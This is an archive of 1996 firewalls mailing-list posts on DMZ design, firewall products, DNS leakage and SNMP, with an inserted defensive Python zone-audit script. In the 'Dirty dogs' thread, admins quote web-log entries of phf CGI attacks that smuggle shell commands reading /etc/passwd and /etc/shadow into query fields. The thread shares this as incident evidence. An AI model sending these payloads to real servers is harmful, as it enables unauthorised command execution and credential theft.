> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
>
> MeOwMyX
>

I found this reference to the cgi-bin program 'phf' at some archive site:

- Please disable the cgi-bin application 'phf' (provided in source code
- form with the NCSA & Apache httpd server distributions in its cgi-src
- directory as the file phf.c) that you have available on your WWW server:
- it contains a vulnerability that can be exploited by remote clients as an
- avenue through which to read files on your system (e.g. /etc/passwd), execute
- arbitrary commands, create and write to files, and to possibly gain
- unauthorized interactive (login) access without password authentication
- and without leaving a significant system audit trail.
-
- All of these actions can be accomplished with the effective permissions
- of the userid that your httpd daemon runs and services requests under.
-
- I have confirmed that your particular system is vulnerable to some
- degree. Please review your httpd access_log for instances of the string
- "phf" to see if attempts have been made to exploit this vulnerability on
- your system.
-
- (You will find instances of that string resulting from connections
- initiated by aleph1.mit.edu [18.238.0.138]; this was me verifying
- your system's vulnerability during a general survey of its widespread
- nature.)
-
- Thank you, and please pass word of this vulnerability to other WWW
- server administrators.
-
-
- Nat Friedman (617-225-6733)
- ndf@linux.mit.edu

Hope this helps!

Chris

********************************************************************
* Chris Carlson                         email: carlson@cycon.com   *
* Cypress Consulting, Inc.              http://www.cycon.com       *
* Cycon Labyrinth Firewall - Stateful Inspection, Packet Modifier  *
********************************************************************

From firewalls-owner Wed Jul 10 15:49:40 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA08125 for firewalls-outgoing; Wed, 10 Jul 1996 15:39:20 -0700 (PDT)
Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA08062 for ; Wed, 10 Jul 1996 15:39:06 -0700 (PDT)
Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA09053
Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1)
Date: Wed, 10 Jul 96 15:35:15 PDT
From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Message-Id: <9607102235.AA02245@manzanita.DEV.3Com.COM.noname>
To: Firewalls@GreatCircle.COM, lafuente@knight-ridder.com
Subject: Re: Web Server on DMZ
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I've seen that solution recommended, and I would agree, it is elegant. The one problem I have with that is that if the machine crashes, you are Out-To-Lunch for connectivity.

I prefer having backup systems that can be put into place easily. In addition, if you are running multiple pieces of equipment, they can be configured to a) provide a more difficult-to-get-through firewall config, and b) back each other up.

I'm not knocking the concept, I plan to make use of a variant myself, I just feel that redundancy is the way to go.

BobK

From firewalls-owner Wed Jul 10 16:19:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA12590 for firewalls-outgoing; Wed, 10 Jul 1996 16:06:59 -0700 (PDT)
Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA12562 for ; Wed, 10 Jul 1996 16:06:50 -0700 (PDT)
Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id QAA15030; Wed, 10 Jul 1996 16:04:12 -0700
Date: Wed, 10 Jul 1996 16:04:12 -0700 (PDT)
From: Robert Hanson
To: jbarnett@micron.net
cc: firewalls@GreatCircle.COM
Subject: Re: Sidewinder Versus EagleRaptor
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

in response to this... without searching the web "i barely have enough time in the day to run to the coffee pot :)... where are these products on the web... thanks!

--->
Robert H. Hanson
LAN/WAN Consultant - Internet Service Provider
Otis Orchards, Wa.
Cutting Edge Communications    www.cet.com    (509) 927-9541
finger: info@cet.com or email: roberth@cet.com

On Wed, 10 Jul 1996 jbarnett@micron.net wrote:

> My organization is finally coming close to making a decision on a firewall
> product.
> My question is this: is there anyone in this group who has
> evaluated both Sidewinder and EagleRaptor within the past year and has:
>
> 1) selected EagleRaptor but now wishes they had gone with Sidewinder
>
> 2) selected Sidewinder but now wishes they had gone with EagleRaptor
>
> 3) selected EagleRaptor for NT and is experiencing difficulties or is elated
>
> You can respond privately to me at jbarnett@micron.net, please. Since this is
> the first time I have tried to post anything to this group (I just joined
> today), please forgive me if I somehow stepped on any rules for posting.
> Thanks!
>
> jon
>
> #########################################################
> Jon Barnett                    jbarnett@micron.net
> (208) 384-7018
> "Colorful ideas are a pigment of your own imagination"
> #########################################################
>

From firewalls-owner Wed Jul 10 18:04:34 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA18275 for firewalls-outgoing; Wed, 10 Jul 1996 17:56:20 -0700 (PDT)
Received: from www.cep.yale.edu (www.cep.yale.edu [130.132.125.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA18267 for ; Wed, 10 Jul 1996 17:56:11 -0700 (PDT)
Received: (from adept@localhost) by www.cep.yale.edu (8.6.12/8.6.9) id VAA24101; Wed, 10 Jul 1996 21:55:04 -0400
Date: Wed, 10 Jul 1996 21:55:04 -0400 (EDT)
From: Ben
To: firewalls@greatcircle.com
Subject: Re: Dirty dogs
In-Reply-To: <9607101528.0LQZ300@morebbs.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jul 1996 meowmyx@morebbs.com wrote:

>
> I was browsing through the system files of a web server that sits outside a
> firewall There were a couple of interesting entries in the access log
>
> 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
> 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
> "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

We got a lot of these too:

access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 -

Not original but they tried--looks like an automated script judging from the similarities of the log entries.

In any case does anyone else have any experiences with this? I know the problem and all, I'm just trying to get an idea of how widespread this is.

Ben.

____
Ben Samman..............................................samman@cs.yale.edu
Give me a good fruitful error every time, full of seeds, overflowing with its own corrections. You can keep your sterile truth to yourself.
- Vilfredo Pareto

From firewalls-owner Wed Jul 10 19:34:39 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21669 for firewalls-outgoing; Wed, 10 Jul 1996 19:31:06 -0700 (PDT)
Received: from lapsene.mii.lu.lv (lapsene.mii.lu.lv [159.148.60.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA21642 for ; Wed, 10 Jul 1996 19:30:57 -0700 (PDT)
Received: (from uulda@localhost) by lapsene.mii.lu.lv (8.7.5/8.7.1) id FAA19529 for firewalls@greatcircle.com; Thu, 11 Jul 1996 05:28:20 +0300 (EET DST)
X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f
>Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92);
Received: from lda by lapsene.mii.lu.lv; Thu, 11 Jul 1996 05:28 EET
Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92);
Received: by lda.gov.lv (FIDO2UU 1.92d [DOS]);
To: firewalls@greatcircle.com
From: Uldis Bojars
Message-Id: <31E4812A@lda.gov.lv>
Subject: Web Server on DMZ
Date: Thu, 11 Jul 1996 00:20:58 +0200
Lines: 20
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bob,

b> Yes, you can put the web server on your DMZ, but the real answer here
b> is to run TWO firewalls.
b> Like so:
b> --company net -+-/Corp-Firewall/-+-DMZ w/servers-+-/outer firewall/
b> --Internet

Can a properly configured cisco router be used as an outer firewall to provide protection (no protection is absolute of course) for DMZ?

Uldis

--- GoldED/386 2.50.B0822+

From firewalls-owner Wed Jul 10 19:55:17 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22002 for firewalls-outgoing; Wed, 10 Jul 1996 19:37:29 -0700 (PDT)
Received: from services (services.state.mo.us [168.166.0.67]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA21989 for ; Wed, 10 Jul 1996 19:37:21 -0700 (PDT)
Received: from services by services (SMI-8.6/SMI-SVR4)
Date: Wed, 10 Jul 1996 21:34:49 -0500 (CDT)
From: James Proffer
X-Sender: james@services
To: firewalls@greatcircle.com
Subject: Re: Dirty dogs
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> We got a lot of these too:
>
> access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET
> /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 -
>
> Not original but they tried--looks like an automated script judging from
> the similarities of the log entries.
>
> In any case does anyone else have any experiences with this? I know the
> problem and all, I'm just trying to get an idea of how widespread this is.

Our one and only attempt was on July 4 of this year.
slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET /cgi-bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd HTTP/1.0" 403 0 Missouri State Data Center <*> James Proffer: UNIX sysadm Missouri Government Information | mailto:james@mail.state.mo.us for the citizens of Missouri | http://www.state.mo.us/server.html and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 From firewalls-owner Wed Jul 10 20:19:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA23950 for firewalls-outgoing; Wed, 10 Jul 1996 20:04:26 -0700 (PDT) Received: from mail.ee.net (mail.ee.net [206.31.38.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA23934 for ; Wed, 10 Jul 1996 20:04:18 -0700 (PDT) Received: from goffer.research.megasoft.com ([206.230.35.93]) by mail.ee.net (8.7.4/8.7.3) with SMTP id XAA13552; Wed, 10 Jul 1996 23:00:28 -0400 (EDT) Received: by goffer.research.megasoft.com (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 22:57:37 -0400 Message-Id: <199607110257.WAA24402@goffer.research.megasoft.com> From: C Matthew Curtin To: Shepherd Rudie Cc: "'firewalls@greatcircle.com'" Subject: Re: DNS leakage In-Reply-To: References: Reply-To: cmcurtin@fahlgren.com X-Attribution: Matt Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "SR" == Shepherd Rudie writes: SR> Problem is this: The last time my zone was transferred to my ISP, SR> the INTERNAL names suddenly appeared on the internet! Of course SR> this wrecked e-mail and other things as well, but how is this SR> possible? How can the outside DNS provide the secondary with any SR> information regarding the inside? BTW the inside network is not SR> even accessible from the Internet (and thus the secondary SR> DNS). Any ideas? You need to figure out which file with your internal stuff is being sent outside. 
Make sure that there aren't any major errors like internal stuff in outside zones, etc., and then once you've located the files with the inside stuff, take a look at your zone transfer logs. That will tell you how things got sent out... The man page on named is your friend. -- C Matthew Curtin Chief Hacker Fahlgren, Inc. 655 Metro Pl S, Ste 700, Box 7159 Dublin OH 43017-7159 http://www.local.com/~cmcurtin/ cmcurtin@fahlgren.com PGP Mail Preferred From firewalls-owner Wed Jul 10 21:27:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA00898 for firewalls-outgoing; Wed, 10 Jul 1996 21:19:30 -0700 (PDT) Received: from mercury.hypersurf.com (mercury.hypersurf.com [204.69.218.162]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA00890 for ; Wed, 10 Jul 1996 21:19:24 -0700 (PDT) Received: (from dcarney@localhost) by mercury.hypersurf.com (8.6.10/8.6.10) id VAA26247; Wed, 10 Jul 1996 21:20:15 -0700 Date: Wed, 10 Jul 1996 21:20:15 -0700 From: Don Carney Message-Id: <199607110420.VAA26247@mercury.hypersurf.com> To: firewalls@GreatCircle.COM, james@mail.state.mo.us Subject: Re: Dirty dogs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We had one on July 2nd. 
slip50.genstar.net - - [02/Jul/1996:16:46:55 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 27121 maybe someone should send a note to genstar.net Don Carney Hypersurf Internet Services

From firewalls-owner Wed Jul 10 21:34:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA01028 for firewalls-outgoing; Wed, 10 Jul 1996 21:23:39 -0700 (PDT) Received: from mailhost.worldnet.att.net (mailhost.worldnet.att.net [204.127.129.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA01020 for ; Wed, 10 Jul 1996 21:23:32 -0700 (PDT) Received: by mailhost.worldnet.att.net (SMI-8.6/SMI-SVR4) Received: from 36.orlando-2.fl.dial-access.att.net(199.70.197.36) Message-ID: <31E4821F.3D7@worldnet.att.net> Date: Thu, 11 Jul 1996 00:25:03 -0400 From: "Syer A. Caudill" Reply-To: howzit@worldnet.att.net X-Mailer: Mozilla 3.0b4Gold (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Extending Financial Applications And Protecting via a Firewall References: <199607030800.BAA28912@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Our organization would like to extend a human resources application to the internet. Our goal is to allow end users to post payroll hours over the internet. The nature of the application requires allowing access to a production Oracle database. The only service to be provided is http. The database is production, must be updated by the end-user via the internet. What firewall strategies should be pursued for this type of endeavour? Any input would be appreciated.
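Following up the "DNS leakage" reply earlier on this page (find which file carries the inside names, then look at the zone transfer logs), here is an added example that is not the poster's code. It scans a zone file for records that belong to the inside (RFC 1918 addresses, an internal-only name suffix, or pointers at such names) and then reads named's syslog lines to see who pulled the zone. The zone file and log lines are constructed for the example, and the 'approved AXFR from [addr].port for "zone"' wording is an assumption about BIND's log output, not something taken from the thread.

```python
"""Find inside-only records that leaked into an outward-facing zone.

Added example for the "DNS leakage" reply on this page; not the poster's code.
The zone file and log lines are constructed; the 'approved AXFR' log wording
is assumed for BIND and may need adjusting to the named version in use.
"""
import ipaddress
import re

PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# name [ttl] IN type rdata   (comments are stripped before matching)
RECORD_RE = re.compile(r'^(?P<name>\S+)\s+(?:\d+\s+)?IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.+)$')
# assumed BIND syslog wording for answered / refused zone transfers
AXFR_RE = re.compile(r'named\[\d+\]: (?P<verdict>approved|unapproved) AXFR from '
                     r'\[(?P<addr>[^\]]+)\]\.\d+ for "(?P<zone>[^"]+)"')


def is_private(text):
    """True for an RFC 1918 address, which has no business in a public zone."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_NETS)


def qualify(name, origin):
    """Turn a zone-file owner or target name into a fully qualified one."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def audit_zone(zone_text, origin, internal_suffix):
    """Records that expose the inside: internal names, private addresses,
    or pointers at internal names.  Returns (name, type, rdata, reasons)."""
    findings = []
    for raw in zone_text.splitlines():
        line = raw.split(";", 1)[0].rstrip()      # drop comments
        if not line or line.startswith("$"):      # blank lines, $ORIGIN/$TTL
            continue
        m = RECORD_RE.match(line)
        if not m:
            continue
        name = qualify(m["name"], origin)
        rtype, rdata = m["type"], m["rdata"].strip()
        reasons = []
        if name.endswith(internal_suffix):
            reasons.append("internal name")
        if rtype == "A" and is_private(rdata):
            reasons.append("private address")
        if (rtype in ("CNAME", "MX", "NS")
                and qualify(rdata.split()[-1], origin).endswith(internal_suffix)):
            reasons.append("points at internal name")
        if reasons:
            findings.append((name, rtype, rdata, reasons))
    return findings


def zone_transfers(log_text, zone, allowed):
    """(address, verdict, expected?) for every transfer of `zone` that named logged."""
    events = []
    for line in log_text.splitlines():
        m = AXFR_RE.search(line)
        if m and m["zone"] == zone:
            events.append((m["addr"], m["verdict"], m["addr"] in allowed))
    return events


# Constructed zone: the outward copy of example.com with two inside records in it.
ZONE_TEXT = """\
$ORIGIN example.com.
@          IN SOA   ns1.example.com. hostmaster.example.com. ( 1996071101 3600 900 604800 86400 )
@          IN NS    ns1.example.com.
@          IN NS    ns.isp.example.net.
@          IN MX    10 mail.example.com.
ns1        IN A     192.0.2.1
www        IN A     192.0.2.2
mail       IN A     192.0.2.3
payroll.internal IN A 10.1.2.3       ; inside host: should not be here
fw-inside  IN A     192.168.1.1      ; firewall inside interface: should not be here
db         IN CNAME payroll.internal.example.com.
"""

# Constructed named syslog lines; only 192.0.2.53 is the ISP secondary we expect.
NAMED_LOG = """\
Jul 10 03:12:44 ns1 named[212]: approved AXFR from [192.0.2.53].1029 for "example.com"
Jul 10 03:12:44 ns1 named[212]: approved AXFR from [192.0.2.53].1029 for "2.0.192.in-addr.arpa"
Jul 10 09:41:07 ns1 named[212]: approved AXFR from [198.51.100.7].4211 for "example.com"
Jul 10 09:41:08 ns1 named[212]: unapproved AXFR from [198.51.100.7].4212 for "internal.example.com"
"""

if __name__ == "__main__":
    for name, rtype, rdata, reasons in audit_zone(ZONE_TEXT, "example.com.", ".internal.example.com."):
        print(f"LEAK  {name:32} {rtype:5} {rdata:32} {', '.join(reasons)}")
    for addr, verdict, expected in zone_transfers(NAMED_LOG, "example.com", {"192.0.2.53"}):
        print(f"AXFR  {addr:16} {verdict:10} {'expected' if expected else 'UNEXPECTED'}")
```

Run it against the zone file the primary actually serves to the secondary, not a working copy, and treat any "UNEXPECTED" puller as a sign that transfers are not restricted to the secondary's address.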
From firewalls-owner Wed Jul 10 22:35:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA05948 for firewalls-outgoing; Wed, 10 Jul 1996 22:20:57 -0700 (PDT) Received: from elaine18.Stanford.EDU (elaine18.Stanford.EDU [36.216.0.206]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id WAA05915 for ; Wed, 10 Jul 1996 22:20:38 -0700 (PDT) Received: (from jkoum@localhost) by elaine18.Stanford.EDU (8.7.5/8.7.3) id WAA04614; Wed, 10 Jul 1996 22:18:04 -0700 (PDT) Date: Wed, 10 Jul 1996 22:18:04 -0700 (PDT) From: Jan Koum To: Don Carney cc: firewalls@GreatCircle.COM, james@mail.state.mo.us Subject: Re: Dirty dogs In-Reply-To: <199607110420.VAA26247@mercury.hypersurf.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Maybe, or maybe not. Case of "not" is when genstar is started by hackers and maintained by hackers. In that case you don't have much left to do, which brings me to my question: How do you deal with hosts maintained by hackers? Who do you contact in case of problems? What is legality like on this? I am sure the FBI wouldn't worry about small/private hosts, and most local police don't know enough about computers. On Wed, 10 Jul 1996, Don Carney wrote: > We had one on July 2nd.
> > slip50.genstar.net - - [02/Jul/1996:16:46:55 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 27121 > > > maybe someone should send a note to genstar.net > > > Don Carney > Hypersurf Internet Services >

From firewalls-owner Wed Jul 10 22:58:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA04813 for firewalls-outgoing; Wed, 10 Jul 1996 22:05:13 -0700 (PDT) Received: from burnout.cts.com (burnout.cts.com [205.163.23.25]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id WAA04781 for ; Wed, 10 Jul 1996 22:05:01 -0700 (PDT) Received: from rruda (rruda.osti.com [204.212.129.32]) by burnout.cts.com (8.6.12/8.6.9) with SMTP id WAA05430; Wed, 10 Jul 1996 22:02:33 -0700 Received: by rruda with Microsoft Mail Message-ID: <01BB6EAC.43782C40@rruda> From: Richard Ruda To: "'GreatCircles firewall message host'" Cc: "'Bill Stout'" Subject: DNS problem with MS NTServer 4.0b2 Date: Wed, 10 Jul 1996 22:07:46 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

We are testing DNS with MS NTSERVER 4.02b. We still of course have our internet provider sending mail to our pop server and we are still relying on them..... We are also not DNS experts so you will excuse the ignorance. We have created our DNS server on our machine called ntserver. Under the IP address for ntserver are all the in-addr.arpa records (created automatically), cache, then our domain osti.com and underneath this ntserver itself. (If you've setup DNS with 4.02b I hope you can follow this).

IP xxx.xxx.xxx.xxx
 | 0.in-addr.arpa
 | 127.in-addr.arpa
 | 255.in-addr.arpa
 | Cache
 | osti.com
   |_ _ _ ntserver

The records within osti.com include the NS (ntserver.osti.com) the SOA (both these set up auto) and all our other hosts (manually entered).
We have not yet setup any other records under ntserver itself (not sure if we have to). Mail continues to flow through our existing mail server from our provider. Under TCP/IP properties the DNS search order is the IP address of ntserver and second our internet provider's. All continues to work fine except the following. To test I created resolv.conf on our HP box with the following:

domain osti.com
nameserver xxx.xxx.xxx.xxx

All works fine and the HP sees the name server, ntserver. However we have a test program that runs sendmail to send mail back to me rruda@osti.com and to an outside domain. The outside domain receives mail but I do not get anything back. (The program runs sendmail on the HP and mails it to me rruda@osti.com.) The Mailer Daemon on the HP tells me that it has returned mail for me - Returned mail, host unknown. osti.com is unknown. Why can I see other domains but not my own? Ping and finger seem to confirm this. Clearly not all the records have been setup for DNS and this is the problem (we are still relying on our internet provider for outside resolution).
I have DNS and BIND and have read useful sections but cannot readily translate for NT/this problem. Can anyone assist please as to what we need to do? Thanks Richard Ruda

From firewalls-owner Wed Jul 10 23:09:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA07924 for firewalls-outgoing; Wed, 10 Jul 1996 22:48:30 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id WAA07914 for firewalls@greatcircle.com; Wed, 10 Jul 1996 22:48:24 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA22041 for ; Wed, 10 Jul 1996 08:33:54 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id LAA12099; Wed, 10 Jul 1996 11:31:05 -0400 Message-Id: <199607101531.LAA12099@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: mbai@straticom.com Date: Wed, 10 Jul 1996 11:32:30 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: NT Backoffice "Catapult" firewall certified? Reply-to: alexf@iss.net CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> John Betts wrote: > How does NT allow anyone to read and write to the registry? Could you > also forward the address for the listserv for the ntsecurity list? We

To subscribe to the NTSecurity list send mail to majordomo@iss.net with the following in the body:

subscribe ntsecurity my@email.address

(Where my@email.address is your email address). Soon you'll be able to sign up over the web for the list (just gotta get around to it).
Alex F alexf@iss.net =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Wed Jul 10 23:23:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA07696 for firewalls-outgoing; Wed, 10 Jul 1996 22:46:39 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id WAA07622 for firewalls@greatcircle.com; Wed, 10 Jul 1996 22:46:20 -0700 (PDT) Received: from uustar.starnet.net (uustar.starnet.net [199.217.253.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA01625 for ; Tue, 9 Jul 1996 18:57:08 -0700 (PDT) Received: from hq.UUCP by uustar.starnet.net with UUCP id AA09710 Received: (from daemon@localhost) by hq.agedwards.com (8.6.9/8.6.9) id SAA16078 for firewalls@greatcircle.com.outbound; Tue, 9 Jul 1996 18:10:38 -0500 Received: from igate.agedwards.com (igate.agedwards.com [159.45.56.11]) by hq.agedwards.com (8.6.9/8.6.9) with ESMTP id SAA16074 for ; Tue, 9 Jul 1996 18:10:37 -0500 Received: from Microsoft Mail (PU Serial #1093) From: nicholscs@agedwards.com (Nichols,Christopher) To: firewalls@greatcircle.com ('SMTP: firewalls@greatcircle.com') Message-Id: <1996Jul09.180928.1093.58516@igate.agedwards.com> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: A.G. Edwards & Sons Inc. St. Louis Date: Tue, 09 Jul 1996 18:11:33 -0500 Subject: snmp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What are the risks of running an snmp agent on a firewall? For example, to monitor your ISP or your external router? and then periodically retrieve the data off of the box via an encrypted tunnel or ssh back to your Openview server on the internal net. If there are serious risks with snmp then what are others doing? Is there a proxy available (i.e. fwtk)? 
Chris

From firewalls-owner Thu Jul 11 02:35:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA23879 for firewalls-outgoing; Thu, 11 Jul 1996 02:16:15 -0700 (PDT) Received: from isgate.is (isgate.is [193.4.58.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id CAA23862 for ; Thu, 11 Jul 1996 02:15:57 -0700 (PDT) Received: from linda.if.is by isgate.is (8.7.5-M/ISnet/14-10-91); Thu, 11 Jul 1996 09:13:23 GMT Received: by linda.if.is (Secure/IFnet/26-04-96); Thu, 11 Jul 1996 09:13:22 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199607110913.JAA26973@linda.if.is> Subject: Re: Dirty dogs To: firewalls@GreatCircle.COM Date: Thu, 11 Jul 1996 09:13:22 +0000 (GMT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:28:29 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116
annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:04 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 7241
annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:48 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 7241
annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:57 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 154
annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:31:30 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 105
annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:32:06 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175
annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:35:24 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 0
kuddp45.zilker.net unknown - [17/Jun/1996:00:35:44 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175
kuddp45.zilker.net unknown - [17/Jun/1996:00:37:21 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175
